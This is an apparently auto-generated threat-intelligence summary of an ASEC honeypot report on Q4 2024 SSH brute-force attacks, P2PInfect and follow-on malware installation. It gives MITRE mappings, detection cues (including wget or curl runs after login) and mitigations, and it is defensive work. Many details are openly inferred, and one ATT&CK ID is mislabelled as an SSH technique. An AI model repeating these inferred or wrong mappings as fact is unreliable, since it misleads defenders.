Full Report
Overview AhnLab SEcurity intelligence Center (ASEC) uses a honeypot to respond to and classify brute-force attacks and pre-attacks targeting Linux SSH servers that are being inappropriately managed. This article covers the status of the attack sources identified in the logs from the fourth quarter of 2024 and provides statistics on the attacks launched from these […]
Analysis Summary
This article focuses on analyzing brute-force and pre-attack activities targeting poorly managed Linux SSH servers during the fourth quarter of 2024, utilizing logs collected from a honeypot setup by AhnLab Security Intelligence Center (ASEC). The analysis specifically excludes data related to the P2PInfect worm to provide a clearer view of other prevalent attack vectors.
# Tool/Technique: P2PInfect Worm (Mentioned as excluded factor)
## Overview
A malware family observed in brute-force attacks against Linux SSH servers, the P2PInfect worm was a significant component of the observed attack traffic in Q4 2024, accounting for nearly half of all attacks logged before its exclusion from detailed statistics. Its nature suggests peer-to-peer capabilities, likely for propagation.
## Technical Details
- Type: Malware family (Worm)
- Platform: Linux (Inferred from target systems)
- Capabilities: Used in brute-force attacks, capable of self-propagation (as a worm).
- First Seen: Not specified
## MITRE ATT&CK Mapping
*Since specific TTPs associated *only* with P2PInfect are not detailed beyond its attack context, the mapping below is inferred from the general activities described.*
- [TA0001 - Initial Access]
- [T1110 - Brute Force]
- [T1078.004 - Valid Accounts: SSH] (Inferred credential compromise)
## Functionality
### Core Capabilities
- Execution of brute-force attempts against Linux SSH servers.
- Significant volume contributor to observed attacks (49.3% of total).
### Advanced Features
- As a worm, it likely propagates across compromised or vulnerable systems.
## Indicators of Compromise
- File Hashes: Not provided in the text.
- File Names: Not provided in the text.
- Registry Keys: Not applicable (Linux target).
- Network Indicators: Not provided in the text.
- Behavioral Indicators: Attempting unauthorized login via SSH.
## Associated Threat Actors
- Not explicitly named in the text.
## Detection Methods
- Detection would rely on identifying high volumes of abnormal SSH login attempts (brute-force activity).
## Mitigation Strategies
- Enforcing strong, unique passwords for SSH access.
- Implementing SSH key-based authentication instead of passwords.
- Limiting login attempts (rate limiting).
- Restricting SSH access via firewall rules.
## Related Tools/Techniques
- Other brute-force tools or scripts used against SSH.
---
# Tool/Technique: SSH Brute-Force/Credential Stuffing (General Attack Technique)
## Overview
The primary observed activity against poorly managed Linux SSH servers involves automated attempts to gain unauthorized access using brute-force methods or credential stuffing against poorly secured accounts. This activity precedes any payload delivery or deeper compromise.
## Technical Details
- Type: Technique (Attack Pattern)
- Platform: Linux (SSH service)
- Capabilities: Automated attempts to guess or test username/password combinations for SSH access.
- First Seen: Ongoing activity, Q4 2024 focus.
## MITRE ATT&CK Mapping
- [TA0001 - Initial Access]
- [T1110 - Brute Force]
- [T1110.004 - Brute Force: Password Guessing] (If dictionary/manual, though context implies automated)
- [T1110.003 - Brute Force: Credential Stuffing] (Implied by common attack patterns)
- [TA0008 - Lateral Movement] (If successful logins are used to move between systems)
## Functionality
### Core Capabilities
- Scanning the environment for active SSH ports.
- Executing automated login attempts using known or common credentials (dictionary attacks) or credential dumps (stuffing).
### Advanced Features
- Attacks often stop after successful login or credential acquisition, moving to information gathering or malware installation stages only if successful.
## Indicators of Compromise
- File Hashes: N/A (Activity focus)
- File Names: N/A (Activity focus)
- Registry Keys: N/A (Linux target)
- Network Indicators: High volume of connection attempts to port 22 (SSH) from a limited set of source IPs.
- Behavioral Indicators: Repetitive failed login events recorded in SSH logs (`auth.log` or similar).
## Associated Threat Actors
- Various automated actors/bots utilizing compromised infrastructure.
## Detection Methods
- **Signature-based detection:** Not applicable, as this is behavioral.
- **Behavioral detection:** Monitoring authentication logs for rapid sequences of failed login attempts originating from the same source IP(s). Rate limiting monitoring.
- **YARA rules:** Not applicable.
## Mitigation Strategies
- **Account Lockout Policies:** Implement policies that temporarily lock accounts after a few failed login attempts.
- **Use Strong Passwords:** Mandate complex passwords.
- **2FA/MFA:** Implement Multi-Factor Authentication for SSH if possible.
- **Use SSH Keys:** Disable password-based login entirely and rely solely on SSH key pairs.
- **Fail2Ban/DenyHosts:** Utilize intrusion prevention software configured to automatically block IPs exhibiting brute-force behavior.
## Related Tools/Techniques
- Dictionary Attacks
- Credential Stuffing
---
# Tool/Technique: Malware Installation (Post-Brute Force Stage)
## Overview
The analysis notes that statistics are focused on cases where the attack proceeded beyond initial scanning and brute-forcing, specifically logs showing the *installation of malware* onto the compromised Linux system. This represents the successful exploitation phase following credential compromise.
## Technical Details
- Type: Technique (Execution/Persistence leading to tool/malware deployment)
- Platform: Linux
- Capabilities: System persistence, downloading and executing secondary payloads, establishing C2 communications.
- First Seen: Ongoing activity, Q4 2024 focus.
## MITRE ATT&CK Mapping
- [TA0002 - Execution]
- [T1059.004 - Command and Scripting Interpreter: Unix Shell] (For deployment commands)
- [TA0003 - Persistence]
- [T1543.002 - Create or Modify System Process: Systemd Service] (Common Linux persistence mechanism)
- [TA0011 - Command and Control] (Inferred subsequent step)
## Functionality
### Core Capabilities
- Executing shell commands to download malware binaries.
- Bypassing execution restrictions (if any).
- Establishing a foothold on the victim machine.
### Advanced Features
- Depending on the specific malware installed (e.g., P2PInfect), advanced capabilities might include rapid, decentralized spreading or data exfiltration.
## Indicators of Compromise
- File Hashes: Specific hashes of installed malware would be present in the full report attachment.
- File Names: Varies greatly based on the specific malware.
- Registry Keys: N/A (Linux target)
- Network Indicators: Outbound connections initiated by a newly spawned process, often to download additional stages or connect to C2.
- Behavioral Indicators: Unusual process execution, execution of `wget`, `curl`, or shell scripts following a successful SSH login event.
## Associated Threat Actors
- Threat Actors leveraging compromised systems for distributed attacks.
## Detection Methods
- **Behavioral detection:** Monitoring for spawned processes that download files or attempt to modify boot/service files following a successful authentication event.
- **Signature-based detection:** Analyzing network traffic for calls resolving to known C2 infrastructure associated with the deployed Linux malware.
## Mitigation Strategies
- **Principle of Least Privilege:** Ensure the compromised account (even if default/weak) has minimal permissions to prevent widespread system modification.
- **System Hardening:** Disable unnecessary services and restrict network egress where possible.
- **Regular Auditing:** Routinely check system services and cron jobs for unauthorized additions.
## Related Tools/Techniques
- Post-exploitation frameworks.
- Various Linux backdoors and miners.